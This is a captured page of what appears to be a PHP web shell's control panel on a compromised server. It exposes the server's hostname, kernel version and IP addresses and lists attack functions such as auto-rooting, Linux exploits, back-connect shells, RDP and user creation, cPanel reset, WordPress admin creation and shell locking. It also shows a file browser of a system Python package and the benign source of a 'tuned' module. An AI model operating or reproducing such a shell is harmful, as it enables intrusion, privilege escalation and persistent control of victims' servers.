Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.15.26.231
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
site-packages /
tuned /
hardware /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
90
B
-rw-r--r--
__init__.pyc
253
B
-rw-r--r--
__init__.pyo
253
B
-rw-r--r--
device_matcher.py
1.54
KB
-rw-r--r--
device_matcher.pyc
2.11
KB
-rw-r--r--
device_matcher.pyo
2.11
KB
-rw-r--r--
device_matcher_udev.py
521
B
-rw-r--r--
device_matcher_udev.pyc
1.06
KB
-rw-r--r--
device_matcher_udev.pyo
1.06
KB
-rw-r--r--
inventory.py
3.59
KB
-rw-r--r--
inventory.pyc
4.76
KB
-rw-r--r--
inventory.pyo
4.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : device_matcher_udev.py
from . import device_matcher import re __all__ = ["DeviceMatcherUdev"] class DeviceMatcherUdev(device_matcher.DeviceMatcher): def match(self, regex, device): """ Match a device against the udev regex in tuning profiles. device is a pyudev.Device object """ properties = '' try: items = device.properties.items() except AttributeError: items = device.items() for key, val in list(items): properties += key + '=' + val + '\n' return re.search(regex, properties, re.MULTILINE) is not None
Close